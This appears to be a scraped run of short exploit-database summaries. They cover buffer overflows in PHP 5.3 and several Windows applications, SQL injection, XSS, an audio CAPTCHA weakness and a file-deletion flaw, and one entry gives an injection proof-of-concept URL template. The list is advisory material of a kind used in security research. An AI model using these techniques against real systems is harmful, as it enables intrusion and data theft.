This exploit is a buffer overflow vulnerability in PHP 5.3.3-5.3.6. It creates a sled of NOP instructions and then appends the shellcode to it. It then creates a socket connection to the address specified in the EVIL_SPACE_ADDR constant and connects to it, thus popping a shell.
This module exploits a vulnerability found in VisiWave's Site Survey Report application. When processing .VWR files, VisiWaveReport.exe attempts to match a valid pointer based on the 'Type' property (valid ones include 'Properties', 'TitlePage', 'Details', 'Graph', 'Table', 'Text', 'Image'), but if a match isn't found, the function that's supposed to handle this routine ends up returning the input as a pointer, and later used in a CALL DWORD PTR [EDX+10] instruction. This allows attackers to overwrite it with any arbitrary value, and results code execution. A patch is available at visiwave.com; the fix is done by XORing the return value as null if no match is found, and then it is validated before use.
A hacker can get admin access to web database leading to further attacks, Shelling and Rooting of server. The POC is http://[sitename]/[pathToApplication]/photo.php?id=%InjectHere%. For example, http://site.com/work/photo.php?id=%injectHere%19
This module exploits a stack buffer overflow in Magix Musik Maker 16. When opening a specially crafted arrangement file (.mmm) in the application, an unsafe strcpy() will allow you to overwrite a SEH handler. This exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7. Egghunter is used, and might require up to several seconds to receive a shell.
The application suffers from multiple issues including: reflected and stored xss, sql Injection, local file inclusion, url redirection. Vulnerable parameters include: 'name', 'comment', 'nid', 'submit1', 'email', 'topic_id'.
MySchool Version 7.02 is vulnerable to SQL Injection. An attacker can inject malicious SQL queries via the 'ID' and 'Page_ID' parameters in the 'index.php' and 'show_page.php' scripts respectively. An attacker can exploit this vulnerability to gain access to the administrative control panel by entering the URL 'http://localhost/myschool/login.php'.
PHPCaptcha, also known as Securimage, is a popular Open Source PHP CAPTCHA library. It is also used in popular WordPress plugins such as the 'Fast Secure Contact Form'. Insufficient distortion in the audio version of the CAPTCHA allows an attacker to quickly decode the CAPTCHA by performing basic binary analysis of the generated audio file. The issue is compounded by the fact that even if the audio feature of the CAPTCHA has been disabled, it can still be accessed by forceful browsing to the /secure_play.php URI.
An error occurs when an attacker points a single page. This leads to discover the full path of web server and vhost directory. The 'Quantity' field of Store Product don't sanitizes user input before to show output back to user. This leads an attacker to inject and execute arbitrary javascript and/or html code. You have to be logged as Admin. The 'Zones Name & Code' fields of Locations/Taxes don't sanitizes user input before to store it into database and to show output back to user. This leads an attacker to inject and execute arbitrary javascript and/or html code.
This vulnerability allows an attacker to delete another user's upload file by changing the request message to attacking file's post ID and file ID/name.
This exploit is a SEH overwrite exploit for SpongeBob SquarePants Typing from The Learning Company. It uses a jump 6 instruction, a pop pop ret from mss32.dll, and a windows/exec shellcode of 247 bytes. It was tested on WinXP SP3.
Services By CQR